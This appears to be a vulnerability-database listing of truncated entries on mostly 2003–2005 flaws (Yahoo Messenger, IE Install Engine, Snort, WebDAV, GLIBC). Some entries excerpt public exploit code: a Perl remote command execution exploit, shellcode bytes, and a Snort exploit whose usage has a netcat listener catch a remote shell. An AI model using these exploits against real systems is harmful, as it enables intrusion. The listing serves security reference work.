Yahoo messenger multiple security vulnerabilities
Filename spoofing, local privilege escalation with Audio Setup Wizard...
CVE-2005-0242
The CVE-2005-0242 vector affects Yahoo! Messenger (Windows), where the Audio Setup Wizard (asw.dll) could execute arbitrary code by placing a malicious ping.exe in the Messenger directory due to weak default permissions. The vulnerability enables local code execution with the privileges of the us...
GNU a2ps - Anything to PostScript Not SUID Local Overflow
/ Not added to Local Non Poc section /str0ke / include include include // by lizard / lizstyleatgmail.com // greets go to slider/trog for helpin me // not suid by default ; define VULNTHING "/usr/bin/a2ps" define DEFRET 0xbffffffa - strlensc - strlenVULNTHING define xnullbitch 1100 //im not a asm...
Microsoft Internet Explorer Install Engine Control Buffer Overflow (#NISR19012005a)
NGSSoftware Insight Security Research Advisory Name: Microsoft Internet Explorer Install Engine Control Buffer Overflow Systems Affected: Microsoft Internet Explorer 5.x/6.x Severity: High Vendor URL: http://www.microsoft.com/ Author: Peter Winter-Smith [email protected] Date of Public...
DEBIAN-CVE-2004-1311
Integer overflow in the real_setup_and_get_header function in real.c for Unix MPlayer 1.0pre5 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a Real RTSP streaming media file with a -1 content-length field, which leads to a heap-based...
CVE-2004-2718
PHPMyChat 0.14.5 does not remove or protect setup.php3 after installation, which allows attackers to obtain sensitive information including database passwords via a direct request...
CVE-2004-2407
Unknown vulnerability in phpGroupWare before 0.9.14.002 has unknown attack vectors and impact, related to a "security hole" in the Setup/Config functionality...
Ultrix dxterm buffer overflow
setup flag buffer overflow...
Hydra: SOCKS5
This plugin runs Hydra to find SOCKS5 accounts and passwords by brute force. To use this plugin, enter the 'Logins file' and the 'Passwords file' under the 'Hydra NASL wrappers options' advanced settings block. TRUSTED...
Microsoft Internet Explorer Install Engine contains a buffer overflow vulnerability
Overview The Active Setup Install Engine in Microsoft Internet Explorer contains a buffer overflow vulnerability. This may allow an attacker to take complete control of a vulnerable system. Description The Active Setup Install Engine inseng.dll permits cabinet files to be launched and executed...
Microsoft Windows XP - Workstation Service Remote (MS03-049)
Microsoft Windows XP - Workstation Service Remote MS03-049 / To build new netapi32.lib pedump /exp netapi32.dll netapi32.exp buildlib netapi32.exe netapi32.exp netapi32.lib netapi32.dll d:\rpcwksbo.exe WKS service remote exploit MS03-049 by fiNis fiNisatbkdotru, ver:0.1.1...
Poster.Version:Two Setup Vulnerability
Author: DarkKnight My site: http://www.insecureonline.com Product: Poster.version:two Side Note: This is my first post ever on bugtraq, so bear with me. Vendors: Contacted A vulnerability exists within Poster.version:two that allows a remote attacker to add accounts to a Poster.version:two. The...
CVE-2003-0633
CVE-2003-0633 affects Oracle E-Business Suite 11.5.1–11.5.8, specifically the AOL/J Setup Test Suite component aoljtest.jsp. The vulnerabilities allow a remote attacker to obtain sensitive information without authentication, including the GUEST user password and the application server security ke...
CVE-2003-0426
The installation of Apple QuickTime / Darwin Streaming Server before 4.1.3f starts the administration server with a "Setup Assistant" page that allows remote attackers to set the administrator password and gain privileges before the real administrator...
mnoGoSearch 3.1.20 - Remote Command Execution
!/usr/bin/perl reloaded Remote Exploit for mnoGoSearch 3.1.20 that performs remote command execution as the webserver user id for linux ix86 by pokleyzz use IO::Socket; $host = "127.0.0.1"; $cmd = "ls -la"; $searchpath = "/cgi-bin/search.cgi"; $rawret = 0xbfff105c; $ret = ""; $suffsize = 0; $port...
Snort <=1.9.1 Remote Root Exploit (p7snort191.sh)
No description provided by source. !/bin/sh p7snort191.sh by truff [email protected] Snort 1.9.1 and below remote exploit Tested on Slackware 8.0 with Snort 1.9.1 from sources Usage: 1/ Launch a listening netcat to listen for the shell nc -p 45295 -l 2/ p7snort119.sh yourIP RetAddr Where yourIP i...
MS Windows WebDAV (ntdll.dll) Remote Exploit
Exploit for unknown platform in category remote exploits ============================================ MS Windows WebDAV ntdll.dll Remote Exploit ============================================ // / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / /...
Multiple game servers DDoS attacks
Large UDP response is sent in reply to short request without session setup...
Windows 2000 SMB signing protection bypass
During connection setup it's possible to switch off SMB signing regardless of policy setting...
GLIBC locale - Format Strings
GLIBC locale - Format Strings / su.c by xp, modified by logikal@efnet - tested on redhat 5 - 7 / include include include include include include include include char shellcode = "\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb" "\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"...